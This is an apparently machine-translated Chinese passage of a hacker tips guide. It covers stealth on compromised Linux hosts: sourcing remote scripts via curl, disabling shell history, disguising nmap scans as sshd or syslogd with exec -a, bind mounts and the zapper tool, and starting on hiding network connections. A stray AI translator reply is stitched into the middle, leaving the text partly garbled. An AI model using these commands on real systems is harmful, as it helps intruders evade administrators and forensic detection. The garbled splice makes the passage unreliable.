各种技巧与诀窍
这是我们最喜欢的一些技巧的合集。其中许多技巧并非我们原创,我们只是收集整理。
我们按原样展示这些技巧,不解释其原理。你需要了解 Linux 才能理解它们的工作方式和原因。
有好技巧?加入我们 https://thc.org/ops
让 BASH 更安静。禁用 ~/.bash_history 以及许多其他功能。```sh source <(curl -SsfL https://thc.org/hs)
备用 URL:```sh
source <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)
如果没有 curl/wget,使用 surl 和(临时)安装的 curl,通过 bin curl 调用。```sh
source <(surl https://raw.githubusercontent.com/hackerschoice/hackshell/main/hackshell.sh)
bin curl to (temporarily) install curl (in memory).HackShell 能做的远不止这些,但最重要的是:```sh
unset HISTFILE
[ -n "$BASH" ] && export HISTFILE="/dev/null"
export BASH_HISTORY="/dev/null"
export LANG=en_US.UTF-8
locale -a 2>/dev/null|grep -Fqim1 en_US.UTF || export LANG=en_US
export LESSHISTFILE=-
export REDISCLI_HISTFILE=/dev/null
export MYSQL_HISTFILE=/dev/null
TMPDIR="/tmp"
[ -d "/var/tmp" ] && TMPDIR="/var/tmp"
[ -d "/dev/shm" ] && TMPDIR="/dev/shm"
export TMPDIR
export PATH=".:${PATH}"
if [[ "$SHELL" == *"zsh" ]]; then
PS1='%F{red}%n%f@%F{cyan}%m %F{magenta}%~ %(?.%F{green}.%F{red})%#%f '
else
PS1='\[\033[36m\]\u\[\033[m\]@\[\033[32m\]\h:\[\033[33;1m\]\w\[\033[m\]\$ '
fi
alias wget='wget --no-hsts'
alias vi="vi -i NONE"
alias vim="vim -i NONE"
alias screen="screen -ln"
TERM=xterm reset -I
stty cols 400 # paste this on its own before pasting the next line:
resize &>/dev/null || { stty -echo;printf "\e[18t"; read -t5 -rdt R;IFS=';' read -r -a a <<< "${R:-8;25;80}";[ "${a[1]}" -ge "${a[2]}" ] && { R="${a[1]}";a[1]="${a[2]}";a[2]="${R}";};stty sane rows "${a[1]}" cols "${a[2]}";}
# stty sane rows 60 cols 160
我们大量使用 anew,这是一个快速的变通方法:```shell
xanew() { awk 'hit[$0]==0 {hit[$0]=1; print $0}'; }
which anew &>/dev/null || alias anew=xanew
额外提示:
任何以" "(空格)开头的命令也[不会被记录到历史记录中](https://unix.stackexchange.com/questions/115917/why-is-bash-not-storing-commands-that-start-with-spaces)。```
$ id
这将仅隐藏进程名称。使用 zapper 还可隐藏命令行选项。```shell (exec -a syslogd nmap -Pn -F -n --open -oG - 10.0.2.1/24) # Note the brackets '(' and ')'
启动一个后台的 'nmap',伪装成 '/usr/sbin/sshd':```
(exec -a '/usr/sbin/sshd' nmap -Pn -F -n --open -oG - 10.0.2.1/24 &>nmap.log &)
在 GNU screen 中启动:``` screen -dmS MyName nmap -Pn -F -n --open -oG - 10.0.2.1/24
screen -x MyName
或者,将二进制文件复制到一个新名称:```sh
cd /dev/shm
cp "$(command -v nmap)" syslogd
PATH=.:$PATH syslogd -Pn -F -n --open -oG - 10.0.2.1/24
或者改用绑定挂载,(临时)让 /sbin/init 指向 /dev/shm/nmap:```shell mount -n --bind "$(command -v nmap)" /sbin/init
(/sbin/init -Pn -f -n --open -oG - 10.0.2.1/24 &>nmap.log &)
<a id="zap"></a>
**1.iii. 隐藏你的命令行选项**
使用 [zapper](https://github.com/hackerschoice/zapper):```sh
curl -fL -o zapper https://github.com/hackerschoice/zapper/releases/latest/download/zapper-linux-$(uname -m) && \
chmod 755 zapper
I apologize, but I notice there is no actual content in your message. The message ends with "INPUT:" but no Markdown content follows it.
Please provide the actual chunk content to translate.```sh
./zapper -a klog nmap -Pn -F -n --open -oG - 10.0.0.1/24
(./zapper -a 'sshd: root@pts/0' nmap -Pn -F -n --open -oG - 10.0.0.1/24 &>nmap.log &)
exec ./zapper -f -a'[kworker/1:0-rcu_gp]' tmux
<a id="bash-hide-connection"></a>
**1.iv. 隐藏网络连接**
技巧是劫持 `netstat`,并使用 grep 过滤掉我们的连接。此示例过滤端口 31337 _或_ ip 1.2.3.4 上的任何连接。对于 `ss`(netstat 的替代方案)也应如此。
**方法 1 - 使用 ~/.bashrc 中的 bash 函数隐藏连接**